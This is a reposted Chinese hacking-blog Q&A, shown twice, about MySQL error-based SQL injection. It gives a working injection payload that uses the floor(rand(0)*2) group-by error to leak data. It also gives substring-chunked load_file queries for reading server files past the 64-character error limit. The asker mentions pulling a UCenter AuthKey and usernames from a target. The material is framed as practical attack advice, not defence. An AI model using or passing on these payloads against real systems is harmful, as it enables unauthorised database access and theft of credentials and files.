关于Mysql报错注入的三个问题
2011-05-23 20:37
411 查看
偶老早在T00ls提的仨问题
------------------------Question----------------------
No.1:Mysql报错注入最多能够显示多少字节呢?我Inject到的UC的AuthKey爆出62位一共应该64位
No.2:爆出的用户名中文和特殊符号显示乱码,用Hex()转换了下爆出来再转回去的时候依然乱码,怎么解决?你知道国内很多人爱用各种怪异的符号做用户名,严重影响进度。。
No.3:能否用报错注入Load_File(),我没有成功语句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
--------------------------AnSwer-----------------------
1. 64 位,但是许多报错注入都会在前后加上特别符号,以方便分辨,如[],就变成62位了,可以使用substring来处理
2. 如图:
3. 同样使用substring 以64为1单位慢慢读, 最好就是写个循环来读
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1
本文出自 “About:Blank H4cking” 博客,请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/572000
------------------------Question----------------------
No.1:Mysql报错注入最多能够显示多少字节呢?我Inject到的UC的AuthKey爆出62位一共应该64位
No.2:爆出的用户名中文和特殊符号显示乱码,用Hex()转换了下爆出来再转回去的时候依然乱码,怎么解决?你知道国内很多人爱用各种怪异的符号做用户名,严重影响进度。。
No.3:能否用报错注入Load_File(),我没有成功语句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
--------------------------AnSwer-----------------------
1. 64 位,但是许多报错注入都会在前后加上特别符号,以方便分辨,如[],就变成62位了,可以使用substring来处理
2. 如图:
3. 同样使用substring 以64为1单位慢慢读, 最好就是写个循环来读
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1
本文出自 “About:Blank H4cking” 博客,请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/572000
相关文章推荐
- 关于链接数据库报错Can't open named pipe to host : .pipe:MySQL(2)问题
- 关于Mysql插入中文时报错代码为1366的相关处理及插入中文乱码问题相关处理
- 关于mysql报错的问题
- 关于MySQL数据中复合组件自增长的问题
- MySQL主从复制中关于AUTO_INCREMENT的奇怪问题
- virtualbox中centos用yum安装的mysql关于权限出现的问题
- 关于创建Maven项目修改pom.xml项目报错的问题
- 关于mysql 联表使用count的一个问题
- struts2与spring集成时,关于class属性及成员bean自动注入的问题
- 关于maven clean 时候报错的问题
- 关于mysql的表名/字段名/字段值是否区分大小写的问题
- 关于mysql乱码问题的天坑
- 关于MySQL InnoDB表的二级索引是否加入主键列的问题解释
- MySQL 实现树形的遍历(关于多级菜单栏以及多级上下部门的查询问题)
- [PHP+MySQL开发基础分享]关于PHP会话和网页中文乱码的问题
- fedaro关于mysql的编译问题
- 关于忘记MySQL的root用户密码的问题
- 遇到关于MySQL权限的两个问题
- mybatis关于插入返回主键ID问题(mysql)
- 解决了一个关于mysql登陆的问题.